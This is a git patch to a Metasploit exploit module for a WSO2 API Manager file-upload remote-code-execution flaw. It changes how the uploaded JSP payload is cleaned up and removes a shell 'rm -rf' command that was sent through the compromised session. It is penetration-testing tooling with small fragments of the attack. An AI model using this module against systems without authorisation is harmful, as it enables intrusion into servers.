From 41e7bf8812cd3c4137dc3fcd2cea9636ef9c6f92 Mon Sep 17 00:00:00 2001 From: Heyder Andrade Date: Wed, 11 Dec 2024 11:58:53 +0100 Subject: [PATCH] Enhance: Rollback to register_file_for_cleanup - Verified that the CWD is the WSO2_SERVER_HOME, allowing the uploaded payload file to be registered for cleanup using register_file_for_cleanup. - Improved feedback by including the payload filename in the success message. - Removed redundant on_new_session cleanup logic, as file management is now handled by FileDropper. --- .../multi/http/wso2_api_manager_file_upload_rce.rb | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb b/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb index 9eab0e9574db..f644240df58f 100644 --- a/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb +++ b/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb @@ -6,6 +6,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking + include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck @@ -357,7 +358,9 @@ def upload_payload(api_id, doc_id) ) fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed') unless res&.code == 201 - print_good('Payload uploaded successfully') + register_file_for_cleanup("repository/deployment/server/webapps/authenticationendpoint/#{jsp_filename}") + + print_good("Payload uploaded successfully. File: #{jsp_filename}") return res end @@ -393,12 +396,6 @@ def exploit end end - def on_new_session(session) - super - # Registering for cleanup doesn't work as the file is not placed in the CWD, and the WSO2_SERVER_HOME might vary - session.shell_command_token("rm -rf $WSO2_SERVER_HOME/repository/deployment/server/webapps/authenticationendpoint/#{jsp_filename}") - end - def cleanup return unless session_created?